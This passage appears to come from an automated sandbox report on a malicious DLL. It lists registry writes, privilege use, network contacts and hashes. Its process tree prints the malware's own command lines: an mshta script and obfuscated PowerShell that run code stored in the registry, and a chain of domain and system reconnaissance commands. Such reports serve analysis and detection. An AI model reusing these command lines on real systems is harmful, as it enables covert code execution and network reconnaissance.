ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61393461623965306132373761313836356430333131316363316137306163393031623530396332346265663737303335616631386165353230336236653337000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca290d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca290d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = ffa4c19238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = 449ce29238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = b1d97d9238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7df64d0b8ce57658894b87824f6c7365f089fc082206dc50325f02b2cbfacdea" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0d724897-1082-4cb9- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\bf9b381c0f6d6c6843c6e75b141b29022c99e5eaf9ba7bd4b11b59983bec26d6" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\33c0dd8d-a0ef-4efa- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = dd0d9f9238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002f45ea7f38a7d8018f66709238a7d8018f66709238a7d801116d10000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000376466363464306238636535373635383839346238373832346636633733363566303839666330383232303664633530333235663032623263626661636465610000b20009000400efbe03551a6703551a672e0000000000000000000000000000000000000000000000000052d5dc00370064006600360034006400300062003800630065003500370036003500380038003900340062003800370038003200340066003600630037003300360035006600300038003900660063003000380032003200300036006400630035003000330032003500660030003200620032006300620066006100630064006500610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37646636346430623863653537363538383934623837383234663663373336356630383966633038323230366463353033323566303262326362666163646561000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca490d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca490d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6781d2d3-a64b-43be- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000040a8ae7f38a7d801d67d269238a7d801d67d269238a7d801669907000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000303731616533306263373336353639396430343461373562613831393165346439633339323030666332376238353635643838646165316563383730313364340000b20009000400efbe03551a6703551a672e00000000000000000000000000000000000000000000000000980fd800300037003100610065003300300062006300370033003600350036003900390064003000340034006100370035006200610038003100390031006500340064003900630033003900320030003000660063003200370062003800350036003500640038003800640061006500310065006300380037003000310033006400340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30373161653330626337333635363939643034346137356261383139316534643963333932303066633237623835363564383864616531656338373031336434000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00c9f90d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00c9f90d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ratm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ratm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nskttcvte -value gp; new-alias -name cnejji -value iex; cnejji ([System.Text.Encoding]::ASCII.GetString((nskttcvte "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7417.tmp" "c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp" "c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP"
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5197.bin1 > C:\Users\Admin\AppData\Local\Temp\5197.bin & del C:\Users\Admin\AppData\Local\Temp\5197.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | tcp | |
| NL | 104.80.225.205:443 | tcp | |
| FR | 51.11.192.48:443 | tcp | |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| US | 8.253.183.249:80 | tcp | |
| US | 8.253.183.249:80 | tcp | |
| US | 8.253.183.249:80 | tcp | |
| US | 8.253.183.249:80 | tcp | |
| RO | 37.120.206.71:80 | 37.120.206.71 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| RO | 37.120.206.91:80 | 37.120.206.91 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/1952-130-0x0000000000000000-mapping.dmp
memory/1952-131-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1952-136-0x0000000001320000-0x000000000132D000-memory.dmp
memory/1728-140-0x0000000000000000-mapping.dmp
memory/1728-141-0x000002B3708B0000-0x000002B3708D2000-memory.dmp
memory/1728-142-0x00007FFC8A9B0000-0x00007FFC8B471000-memory.dmp
memory/2004-143-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline
| MD5 | 12ecb4fb620b5882813954a0dd3bbe0c |
| SHA1 | 8c047cfed98be681a04acc40e09928d52eab01c7 |
| SHA256 | b97bdb663a1661bbaa1f4702bbb32a0dd4c86b19cdf9901be415c16e68489a31 |
| SHA512 | c7a0e26b9f4ce49b05b49b1781ee34e952f493d1e6b9af284ca1a6ba200fff63c1a55630b9abc1baebb48c53d4f33a18b8822bccda6692e375a490f88b5b0833 |
